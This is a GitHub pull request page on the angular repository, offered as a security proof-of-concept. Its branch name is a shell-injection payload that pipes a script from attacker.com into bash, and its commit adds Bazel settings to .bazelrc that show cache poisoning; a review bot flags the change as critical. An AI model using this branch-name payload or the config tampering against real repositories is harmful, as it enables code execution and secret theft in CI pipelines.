Skip to content

PoC: Script injection via branch name (DO NOT MERGE)#3828

Open
mabrukhany-beep wants to merge 1 commit into
angular:mainfrom
mabrukhany-beep:";-curl--s-https/attacker.com/poc.sh-|-bash;-echo-"

Hidden character warning

The head ref may contain hidden characters: "";-curl--s-https/attacker.com/poc.sh-|-bash;-echo-""
Open

PoC: Script injection via branch name (DO NOT MERGE)#3828
mabrukhany-beep wants to merge 1 commit into
angular:mainfrom
mabrukhany-beep:";-curl--s-https/attacker.com/poc.sh-|-bash;-echo-"

Conversation

@mabrukhany-beep

Copy link
Copy Markdown

Security Proof-of-Concept - DO NOT MERGE

This PR demonstrates script injection via malicious branch name in pull_request_target workflows.

Branch Name

; curl -s https://attacker.com/poc.sh | bash; echo

Vulnerability

If any workflow uses github.head_ref in a run step without proper quoting, the branch name will be executed as shell code.

Impact

  • Arbitrary code execution in base repository context
  • Secret exfiltration
  • Supply chain compromise

Fix

  • Sanitize all user-controlled inputs before using in shell commands
  • Use single quotes: run: echo '${{ github.head_ref }}'
  • Or avoid using user-controlled inputs in run steps

PoC: Demonstrate cache poisoning vulnerability

This commit modifies .bazelrc to add environment variables that will
be cached by bazel. If the cache is shared with scheduled workflows
(ng-renovate.yml), these variables will be present in those workflows,
proving cache poisoning from PR workflows.

Signed-off-by: mabrukhany-beep <mabrukhany@gmail.com>

@gemini-code-assist gemini-code-assist Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request modifies the .bazelrc file to add a proof of concept for cache poisoning. The reviewer identified a critical security vulnerability, noting that the addition of --workspace_status_command and arbitrary environment variables can lead to arbitrary code execution in developer environments and CI/CD pipelines, and requested their immediate removal.

Comment thread .bazelrc
Comment on lines +13 to +19
# PoC: Cache Poisoning Demonstration
# This proves that bazel cache can be poisoned from PR workflows
# and executed in scheduled workflows (ng-renovate)

build --action_env=POC_CACHE_POISONED=true
test --test_env=POC_CACHE_POISONED=true
build --workspace_status_command="echo 'PoC: Cache poisoned by PR workflow'"

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

security-critical critical

The addition of --workspace_status_command and arbitrary environment variables (--action_env, --test_env) in the shared .bazelrc configuration poses a severe security risk. The workspace_status_command executes arbitrary shell commands during Bazel builds, which can lead to arbitrary code execution (ACE) in developer environments or CI/CD pipelines. These lines must be removed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant